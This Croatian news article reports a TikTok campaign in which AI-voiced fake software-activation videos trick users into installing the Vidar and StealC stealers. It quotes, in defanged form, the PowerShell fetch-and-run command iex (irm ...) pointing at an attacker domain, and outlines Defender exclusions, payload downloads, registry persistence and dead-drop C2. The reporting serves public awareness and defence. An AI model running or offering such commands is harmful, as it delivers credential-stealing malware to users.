Uočena je nova kampanja u kojoj se iskorištavaju popularnost i algoritamski doseg TikToka za distribuciju zlonamjernog softvera, odnosno stealer malwarea. Kriminalci su iskoristili masovnu bazu korisnika ove platforme za širenje sofisticiranog softvera koji krade informacije.
Uočena je napredna kampanja socijalnog inženjeringa koja koristi videozapise generirane umjetnom inteligencijom kako bi prevarila korisnike da preuzmu opasne programe. Ovi videozapisi obmanjuju korisnike nudeći tutorijale za aktivaciju softvera, ali zapravo isporučuju zlonamjerni softver poznat kao Vidar i StealC. Ciljaju se legitimni programi kao što su Windows operativni sustav, Microsoft Office, CapCut i Spotify, obećavajući njihovu aktivaciju, dok u stvarnosti korisnicima šalju ove opasne programe.
Ova strategija predstavlja značajan pomak u načinu distribucije zlonamjernog softvera, napuštajući tradicionalne metode poput zlonamjernih web stranica ili e-mail prijevara. Umjesto toga, cijela kampanja socijalnog inženjeringa ugrađena je direktno u video sadržaj na platformi kao što je TikTok, što znatno otežava otkrivanje od strane sigurnosnih rješenja. Kriminalci koriste viralnu prirodu TikToka, pri čemu je jedan takav zlonamjerni videozapis zabilježio gotovo pola milijuna pregleda, više od 20.000 lajkova i preko 100 komentara, što ukazuje na zastrašujući doseg i uspjeh ove kampanje.
Analitičari kompanije Trend Micro identificirali su više TikTok računa koji su sudjelovali u ovoj operaciji, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771. Svi ovi računi su od tada ugašeni. Stručnjaci su primijetili da su spomenuti računi objavljivali vrlo slične videozapise bez prikaza lica, koristeći glasove generirane umjetnom inteligencijom, što sugerira automatizirani proces produkcije osmišljen za skaliranje.
Tehnička sofisticiranost napada postaje očita kroz metodologiju njegove provedbe. Žrtve se upućuju da otvore PowerShell i izvrše navodno bezopasan redak koda: iex (irm hxxps://allaivo[.]me/spotify). Ovaj PowerShell skript pokreće višestupanjski proces infekcije koji demonstrira napredne tehnike izbjegavanja otkrivanja.
Mehanizam infekcije i taktike perzistencije:
Lanac infekcije zlonamjernog softvera otkriva pažljivo organizirane korake osmišljene da osiguraju uspješnu kompromitaciju uz izbjegavanje otkrivanja. Nakon izvršavanja, početni PowerShell skript stvara skrivene direktorije unutar korisničkih mapa APPDATA i LOCALAPPDATA, odmah dodajući te lokacije na listu izuzeća Windows Defendera kako bi se spriječilo skeniranje od strane antivirusnog softvera. Zatim skript preuzima glavni teret sa adrese hxxps://amssh[.]co/file.exe, koji sadrži varijante Vidar ili StealC zlonamjernog softvera. Mehanizam perzistencije uključuje preuzimanje dodatnog PowerShell skripta sa adrese hxxps://amssh[.]co/script[.]ps1 i uspostavljanje ključa registra koji osigurava da se zlonamjerni softver izvršava pri pokretanju sustava. Značajno je da Vidar koristi inovativnu strategiju komande i kontrole, zloupotrebljavajući legitimne usluge poput Steam profila i Telegram kanala kao Dead Drop Resolvere za skrivanje stvarnih adresa C&C servera, čineći napore na otkrivanju i uklanjanju znatno složenijima.